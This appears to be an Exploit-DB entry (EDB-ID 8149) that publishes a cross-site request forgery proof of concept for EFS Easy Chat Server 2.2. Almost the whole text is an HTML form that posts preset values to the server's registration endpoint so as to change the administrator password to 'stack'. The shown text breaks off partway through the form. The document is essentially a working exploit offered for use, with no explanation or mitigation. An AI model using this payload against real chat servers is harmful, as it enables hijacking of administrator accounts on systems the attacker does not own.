EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)

EDB-ID:

8149

CVE:

N/A


Author:

Stack

Type:

remote


Platform:

Windows

Date:

2009-03-03


<HTML>
<!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server  http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
 -->
<HEAD>
<TITLE>EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability</TITLE>
<SCRIPT LANGUAGE="JavaScript">
</SCRIPT>
</HEAD>
<BODY bgcolor="#008000" LANGUAGE="JavaScript">
<div align=center>
<TABLE border="2" width="250">
<FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();">
<TR>
        <TD align="center" class="title"> <font color=red>Booom!!</font> </TD>
      </TR>
<TR>
        <TD> Username:
          <INPUT type="text" name="UserName" maxlength="30" value="admin"> *
</TD></TR>
<TR><TD>
Password:<INPUT type="password" name="Password" maxlength="30"  value="stack"> *
</TD></TR>
<TR>
        <TD> Confirm Password:
          <INPUT type="password" name="Password1" maxlength="30" value="stack"> *
</TD></TR>
<TR>
</TD></TR>
<TR><TD>
Email:<INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30">
</TD></TR>
<TR><TD>
</TD></TR>
<TR><TD>
   <BR>
<TEXTAREA rows="4" cols="30" name="Resume">chi le3ba